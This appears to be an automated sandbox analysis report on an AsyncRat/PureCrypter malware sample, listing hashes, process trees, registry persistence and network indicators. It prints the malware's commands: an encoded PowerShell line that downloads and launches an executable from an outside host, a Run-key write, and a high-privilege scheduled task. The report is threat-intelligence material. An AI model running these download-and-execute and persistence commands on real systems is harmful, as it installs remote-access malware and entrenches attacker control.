SHA256 04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd
SHA512 14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

MD5 a0c1d68c150049944598f3927176a4b9
SHA1 bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1
SHA256 fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908
SHA512 c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

MD5 81230dd9258eebd0fe6a2cc681c43c51
SHA1 d6870e6014503e79589435d3b167f1c6e405721b
SHA256 9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1
SHA512 2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

memory/1800-40-0x0000000000580000-0x0000000000588000-memory.dmp

memory/4976-44-0x0000000000EE0000-0x0000000000EFC000-memory.dmp

memory/1700-47-0x0000000000400000-0x0000000000412000-memory.dmp

memory/3720-49-0x0000000002340000-0x0000000002376000-memory.dmp

memory/3720-50-0x0000000004E00000-0x0000000005428000-memory.dmp

memory/3720-51-0x0000000004B70000-0x0000000004B92000-memory.dmp

memory/3720-52-0x0000000004D90000-0x0000000004DF6000-memory.dmp

memory/3720-53-0x00000000055E0000-0x0000000005646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lyskobsu.vhx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1328-63-0x0000021664F60000-0x0000021664F82000-memory.dmp

memory/3720-73-0x0000000005890000-0x0000000005BE4000-memory.dmp

memory/3720-74-0x0000000005C50000-0x0000000005C6E000-memory.dmp

memory/3720-75-0x0000000006160000-0x00000000061AC000-memory.dmp

memory/3720-76-0x0000000006230000-0x0000000006262000-memory.dmp

memory/3720-77-0x000000006FC30000-0x000000006FC7C000-memory.dmp

memory/3720-87-0x00000000061F0000-0x000000000620E000-memory.dmp

memory/3720-88-0x0000000006E40000-0x0000000006EE3000-memory.dmp

memory/3720-89-0x00000000075B0000-0x0000000007C2A000-memory.dmp

memory/3720-90-0x0000000006F70000-0x0000000006F8A000-memory.dmp

memory/3720-91-0x0000000006FE0000-0x0000000006FEA000-memory.dmp

memory/3720-92-0x00000000071F0000-0x0000000007286000-memory.dmp

memory/3720-93-0x0000000007170000-0x0000000007181000-memory.dmp

memory/3720-94-0x00000000071A0000-0x00000000071AE000-memory.dmp

memory/3720-95-0x00000000071B0000-0x00000000071C4000-memory.dmp

memory/3720-96-0x00000000072B0000-0x00000000072CA000-memory.dmp

memory/3720-97-0x0000000007290000-0x0000000007298000-memory.dmp

memory/3720-98-0x00000000072D0000-0x00000000072F2000-memory.dmp

memory/4840-101-0x0000000000400000-0x000000000042E000-memory.dmp

memory/60-103-0x0000000074B90000-0x0000000075340000-memory.dmp

memory/1528-104-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-106-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-105-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-110-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-116-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-115-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-114-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-113-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-112-0x0000017546A20000-0x0000017546A21000-memory.dmp

memory/1528-111-0x0000017546A20000-0x0000017546A21000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d49246229b2077d7961ee5c90e0945f8
SHA1 8b50bbdbc82b00f545510bc3ea9e8cd96182fa79
SHA256 581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c
SHA512 5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 10:59

Reported

2024-06-15 11:01

Platform

win11-20240508-en

Max time kernel

143s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

Signatures

AsyncRat

rat asyncrat

Detect PureCrypter injector

loader
Description Indicator Process Target
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Ltntuhk\\Zmluvhyw.exe\"," C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A

PureCrypter

loader downloader purecrypter

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\SecurtyService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurtyService\\SecurtyService.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3764 set thread context of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2256 set thread context of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 3620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2148 wrote to memory of 3620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2148 wrote to memory of 3620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2256 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\SysWOW64\cmd.exe
PID 1048 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1048 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1048 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2256 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 2256 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 2256 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
PID 4092 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
PID 4092 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
PID 4092 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 4092 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 4092 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
PID 3764 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 3764 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 3764 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 3188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4120 wrote to memory of 3188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4120 wrote to memory of 3188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4840 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4840 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3764 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2256 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe

"C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 20

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 20

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 40

C:\Windows\SysWOW64\timeout.exe

timeout 40

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

"C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

"C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

"C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 discord.com udp
AZ 217.64.31.3:8437 tcp
AZ 217.64.31.3:8808 tcp
AZ 217.64.31.3:8808 tcp
US 8.8.8.8:53 filebin2.aws.atsign.cloud udp
AZ 217.64.31.3:8437 tcp
AZ 217.64.31.3:8808 tcp
AZ 217.64.31.3:8437 tcp
AZ 217.64.31.3:8437 tcp

Files

memory/2256-0-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

memory/2256-1-0x0000000000A00000-0x0000000000A82000-memory.dmp

memory/2256-2-0x0000000005A10000-0x0000000005FB6000-memory.dmp

memory/2256-3-0x0000000005460000-0x00000000054F2000-memory.dmp

memory/2256-4-0x00000000053E0000-0x00000000053EA000-memory.dmp

memory/2256-5-0x0000000074B00000-0x00000000752B1000-memory.dmp

memory/2256-6-0x00000000067A0000-0x0000000006814000-memory.dmp

memory/2256-7-0x0000000006810000-0x000000000685C000-memory.dmp

memory/2256-8-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

memory/2256-9-0x0000000074B00000-0x00000000752B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

MD5 1a9c46f2b4420d156a82f160facf9376
SHA1 ce91faa7353cb4d3411b20a69350f27a6fe47990
SHA256 04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd
SHA512 14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

MD5 a0c1d68c150049944598f3927176a4b9
SHA1 bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1
SHA256 fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908
SHA512 c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

MD5 81230dd9258eebd0fe6a2cc681c43c51
SHA1 d6870e6014503e79589435d3b167f1c6e405721b
SHA256 9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1
SHA512 2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

memory/3764-43-0x00000000008E0000-0x00000000008FC000-memory.dmp

memory/4840-41-0x0000000000D00000-0x0000000000D08000-memory.dmp

memory/4856-46-0x0000000002AF0000-0x0000000002B26000-memory.dmp

memory/3460-47-0x0000000000400000-0x0000000000412000-memory.dmp

memory/4856-50-0x0000000005530000-0x0000000005B5A000-memory.dmp

memory/4856-51-0x0000000005440000-0x0000000005462000-memory.dmp

memory/4856-53-0x0000000005DB0000-0x0000000005E16000-memory.dmp

memory/4856-52-0x0000000005BD0000-0x0000000005C36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olzpxvl4.u2c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4856-62-0x0000000005E20000-0x0000000006177000-memory.dmp

memory/3688-63-0x000002307DB20000-0x000002307DB42000-memory.dmp

memory/4856-72-0x00000000062D0000-0x00000000062EE000-memory.dmp

memory/4856-73-0x0000000006390000-0x00000000063DC000-memory.dmp

memory/4856-74-0x00000000072C0000-0x00000000072F4000-memory.dmp

memory/4856-75-0x000000006F670000-0x000000006F6BC000-memory.dmp

memory/4856-84-0x0000000007280000-0x000000000729E000-memory.dmp

memory/4856-85-0x0000000007500000-0x00000000075A4000-memory.dmp

memory/4856-86-0x0000000007C60000-0x00000000082DA000-memory.dmp

memory/4856-87-0x0000000007620000-0x000000000763A000-memory.dmp

memory/4856-88-0x00000000076A0000-0x00000000076AA000-memory.dmp

memory/4856-89-0x00000000078B0000-0x0000000007946000-memory.dmp

memory/4856-90-0x0000000007830000-0x0000000007841000-memory.dmp

memory/4856-91-0x0000000007860000-0x000000000786E000-memory.dmp

memory/4856-92-0x0000000007870000-0x0000000007885000-memory.dmp

memory/4856-93-0x0000000007970000-0x000000000798A000-memory.dmp

memory/4856-94-0x0000000007960000-0x0000000007968000-memory.dmp

memory/4856-95-0x00000000079B0000-0x00000000079D2000-memory.dmp

memory/2584-98-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2256-100-0x0000000074B00000-0x00000000752B1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1e6e1eefe52266028bfa762c897b8e42
SHA1 04055d0d63018302918e1e1d4a0a2949f500f5d1
SHA256 356061c3465ca4897bb4848fc68ab931d2eca5b37a8f8180f709417ea992622a
SHA512 cf8cd23c2b4736792439e155f06b514cef1c91b87356e929b69679366fd2e9e5d8866904788dd738ca05ce6fe8eb8e341d1d8d637ff1dde81cfe50be3567b1e5